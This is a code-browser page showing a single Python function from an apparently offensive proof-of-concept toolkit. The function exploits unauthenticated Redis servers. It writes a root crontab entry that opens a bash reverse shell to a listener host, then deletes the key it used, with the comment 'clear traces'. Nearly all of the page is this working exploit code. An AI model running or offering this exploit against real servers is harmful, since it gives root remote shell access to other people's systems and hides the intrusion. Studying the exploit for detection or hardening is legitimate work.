hub / github.com/Xyntax/POC-T / poc

Function poc

script/redis-cron-getshell.py:19–39
(url)


def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
        if 'redis_version' in r.info():
            payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,port=str(listen_port))
            path = '/var/spool/cron'
            name = 'root'
            key = randomString(10)
            r.set(key, payload)
            r.config_set('dir', path)
            r.config_set('dbfilename', name)
            r.save()
            r.delete(key)  # clear traces
            r.config_set('dir', '/tmp')
            return True
    except Exception:
        return False
    return False

Callers

nothing calls this directly

Calls 7

host2IP · Function · 0.90
randomString · Function · 0.90
split · Method · 0.80
info · Method · 0.80
format · Method · 0.80
set · Method · 0.80
delete · Method · 0.80

Tested by

no test coverage detected